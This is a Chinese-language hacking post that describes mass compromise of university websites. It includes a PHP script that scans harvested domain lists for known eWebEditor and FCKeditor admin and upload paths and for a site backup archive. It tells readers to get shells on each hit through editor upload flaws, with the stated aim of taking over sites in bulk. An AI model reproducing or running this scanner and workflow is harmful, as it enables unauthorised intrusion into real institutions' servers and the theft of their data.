批量入侵高校站漏洞EXP

高校站基本上用的是改版的cms，而cms里必定有编辑器。目前的编辑器漏洞很少

是比较安全的，但是高校站不一样。一个高校的网站必定是上了年岁的

除非新成立的大学新成立的学院，这样，cms里有有漏洞的编辑器的概率很大

因此，我们可以通过批量扫描编辑器来拿shell

我们的目的是批量拿站，按照这个思路，我们可以用如下脚本进行批量扫描

EXP附上：

<?php
//Coded by deleter
$f = fopen("scan_in.txt", 'r');
$fw = fopen("scan_out.txt", 'a');
$arr = array("/admin/editor/admin_login.asp",
                        "/manege/ewebeditor/admin_login.asp",
                        "/data/ewebeditor/admin_login.asp",
                        "/ewindoweditor/admin_login.asp",
                        "/webeditor/admin_login.asp",
                        "/Edit/eWebEditor.asp",
                        "/system/eWebEditor/",
                        "/admin/fckeditor/editor/filemanager/connectors/",
                        "/fckeditor/editor/filemanager/connectors/",
                        "/admin/FCKeditor/editor/filemanager/connectors/",
                        "/manage/FCKeditor/editor/filemanager/connectors/",
                        "/web_admin/editor/",
                        "/ewebeditor/",
                        "/wwwroot.rar",
                        "/admin/webeditor/admin_login.asp");
$url = trim(fgets($f));
  while(!feof($f)&&(!empty($url))){       
  foreach($arr as $key => $value){
                $request =  'http://'.$url.$value;
                //请求文件  
                $html = file_get_contents($request);
                //返回HTTP状态码   
                echo $request."n";
                list($version,$status_code,$msg) = explode(' ',$http_response_header[0], 3);
                if($status_code=='200' || $status_code=='403'){
                        fwrite($fw, $request."n");
                }
        }
        $url = trim(fgets($f));
  }
fclose($f);
fclose($fw);
?>
然后把得到的结果用编辑器拿shell的方法挨个进行测试就行了

至于scan_in.txt怎么得到，找个网址采集工具就ok了

PS:扫描路径请自行添加